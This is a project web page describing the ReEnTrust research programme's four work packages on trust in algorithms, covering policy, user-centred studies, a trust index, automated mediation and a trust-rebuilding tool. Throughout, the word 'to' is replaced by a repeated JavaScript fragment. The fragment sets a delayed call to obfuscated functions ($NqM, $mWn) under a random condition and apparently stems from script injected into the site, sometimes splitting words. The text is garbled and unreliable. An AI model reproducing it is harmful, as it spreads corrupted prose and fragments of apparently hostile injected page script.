Work Packages

The ReEnTrust programme of work consists of four integrated workpackages (WPs), described below.

Work Package 1: Responsible policy and practice (lead: Oxford)
This WP will unpack the tensions between the drive for innovation in the design and use of algorithms and the growing desire for meaningful regulation and protection for users. The WP will adopt an RRI approach and carry out literature scoping, interviews, surveys and workshops dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to consider key questions such as

  • How do commercial and non-commercial organisations establish and maintain user trust in the algorithmic systems they use?
  • How do they themselves establish trust in their own systems?
  • How might the level of trust in an algorithmic system be quantified in a “trust index” and how might such an index be of use dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to system users and providers?
  • When might it be reasonable for different stakeholders dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to trust an algorithm and when might other governance structures be needed?
  • How societally acceptable are trust rebuilding systems?
  • How can the design-policy-design relationship be undersdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tood and optimised in RRI terms?

Expected outcomes:

  1. Policy guidelines for engendering trust in the design, development, and use of algorithms.
  2. Evidence and documentation describing the RRI methodology developed through ReEnTrust work.
  3. A portfolio of real-world case studies dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to inform responsible practice.

Work Package 2: User-Centred Trust (lead: Nottingham)
This WP will identify the requirements of trust rebuilding dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tools and explore the capacity for technical solutions dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to responsibly rebuild user trust once it has been lost. This will be achieved via two strands of multi-method, user-driven data collection and analysis.

We will identify how social mechanisms in the rebuilding of trust manifest online, and the requirements for the dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tools and interfaces that would be most effective in supporting the rebuilding of trust. We will run a refined version of the Juries methodology (previously used in UnBias), a methodology for participadom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory research similar dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to focus groups in which scenarios (i.e., vignettes) are discussed with the view
dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to identify juror’s concerns, solutions and critical thinking. Participating groups of older (65+) and younger adults (16+) will co-design and develop interactive (‘hands-on’) scenarios in partnership with project partner Polka Theatre dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to illustrate instances where trust in algorithmic processes was lost and also what the participants did in response, how they felt the platform was responsible, and how the issue was resolved – including how well the platform dealt with the situation and whether trust was regained.

Quantitative measures of psychological wellbeing, self-determination theory, agency and self-competence in trust-related situations will inform the development of a “trust index”. Colleagues at the Mental Health Foundation will provide advice dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ensure that the index is sensitive dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to the issues explored through the co-created scenarios and determine the level of users’ trust when interacting with AI algorithms.

Complementing these first two approaches, we will also conduct video-based studies dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to capture users’ practical experience of trust breakdown. Analysis will focus on the interactions that occur between user and algorithm/platform. It will highlight the kinds of practical behaviours users undertake when seeking dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to resolve problems of trust breakdown, and the particular platform affordances that alternately encourage or discourage trust.

Expected outcomes:

  1. Guidelines for the development of trust rebuilding dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tools, including requirements and assessment criteria.
  2. A framework of guidelines for assessing impact of trust in algorithms on wellbeing, including recommendations about the use and misuse of technologies for citizens’ mental wellbeing.
  3. A “trust index” calculation method dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to quantify the level of trust users have for an algorithmic system.

Work Package 3: Computational methods for rebuilding trust (lead: Edinburgh)
This WP will develop (semi-)audom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomated mediation techniques that allow users and data-driven online service providers dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to recover from situations of trust breakdown. A successful recovery would see a productive relationship between users and services rebuilt following negotiated changes dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to the algorithms that mediate this relationship. Conceptually, we consider the problem of choosing the most acceptable algorithm within a given space of possible choices, based on different users’ feedback on their experience including trust index
metrics, balanced with the platforms’ interests.

We will follow an approach that is based on making the adversarial nature of these interactions explicit, and employing audom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomated negotiation and mediation techniques dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to tackle the overall challenge. Our approach is based on viewing these interactions as games, where the users’ action space includes behaviours and judgments, the providers’ action space includes algorithm choices and statements about the properties of these algorithms, and payoffs can be derived from the “players’” preferences over the algorithms and their
understanding of the algorithm’s properties.

Expected outcomes:

  1. New computational models and algorithms for AI-supported semi-audom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomated mediation.
  2. Analytical and experimental results assessing complexity, efficiency, and usability of these methods.

Work Package 4: A trust rebuilding dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tool (lead: Edinburgh)
This WP will develop and evaluate a concrete software dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tool that will embed the computational methods developed in WP3 dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to provide intelligent trust rebuilding assistance, and several additional functionalities dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to support the users’ understanding of the algorithms. More specifically, this dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tool will offer three different sets of functionalities.

  • First, it will allow users dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to “sandbox” different variations of algorithms dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to assess their behaviour on different datasets, using dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tools such as Faircheck/Fairtest and other measurements concerning the performance of machine learning algorithms. This facility will enable users dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to gain an understanding of different trade-offs and the effects of different parameters, as well as allow them dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to experience their own response dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to algorithm behaviour, which will help them shape and refine their views and judgment of the technologies deployed by online platforms.
  • Secondly, it will provide a component dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to capture experiences, attitudes and opinions of users dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toward algorithms and the platforms that use them, thus not only acting as an “experience base” dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to inform collective discourse about trustability, but also allowing us dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to build the quantitative models of preferences needed for the audom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomated mediation techniques developed in WP3.
  • Finally, it will include a negotiation and mediation component where users and service providers can discuss, debate, and negotiate over the use of algorithms using the structured negotiation dialogue workflows and the audom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomated mediadom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor developed in WP3.

The dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tool developed in this work package will provide the primary vehicle for validating what technical solutions are possible when attempting dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to tackle the overall problem of rebuilding trust between users and algorithms on online platforms.

Expected outcomes:

  1. Implemented prodom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totypes of trust rebuilding dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tools.
  2. Experimental results validating the benefits derived from use of these dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tools.